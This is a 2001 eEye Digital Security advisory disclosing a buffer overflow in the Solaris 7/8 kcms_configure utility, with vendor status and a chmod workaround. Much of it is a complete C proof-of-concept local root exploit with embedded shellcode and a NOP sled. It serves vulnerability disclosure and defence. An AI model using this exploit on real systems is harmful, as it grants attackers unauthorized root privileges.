Solaris kcms_configure vulnerability

Discovered and exploited by:
Riley Hassell riley@eeye.com

Release Date:
April 9, 2001

Systems Affected:
Solaris 7/8 (x86 and sparc)
Versions prior are also most likely affected

Description:
It was another long day at eEye where the beer was once again cold but eEye
Wudan member Riley decided it was time to do some Solaris spring cleaning.
This is the first of several advisories to be released on various Solaris
bugs that were laying around needing to be cleaned out.

We have discovered a buffer overflow in the kcms_configure utility provided
with Solaris 7. The problem exists in the parsing of command line options.
By exploiting this vulnerability an attacker can achieve local root
privileges. The Kodak Color Management System (KCMS) packages have contained
many vulnerabilities in the past, we recommend disabling them if you are not
currently using them.

Proof of Concept:

/*
 Command line argument overflow
 /usr/openwin/bin/kcms_configure

 Proof of Concept Exploitation
 Riley Hassell
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN  1100

/* seteuid/exec shellcode  */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp() { __asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
        int i;
        if (argc > 1)
  	offset = strtol(argv[1], NULL, 0);
        else
             offset = -300;
            nop = 600;
        esp = get_esp();
        memset(buf, 0x90, BUFLEN);
        memcpy(buf+600, shell, strlen(shell));
        for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
        *((int *) &buf[i]) = esp+offset;
         buf[BUFLEN-1] = '\0';
        execl("/usr/openwin/bin/kcms_configure", "eEye",
"-o","-S","X",buf,NULL);
        return;
}

Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches
for this and other related vulnerabilities eEye has discovered. We would
like to thank them for working with us on creating a patch for this
vulnerability.

Workaround:
chmod –s /usr/openwin/bin/kcms_configure
This will remove the setuid bit from kcms_configure, therefore if someone
does exploit this vulnerability, they won’t gain higher privileges.

Greetings:
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
but not least… all the kick ass people at Speakeasy.net.

Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com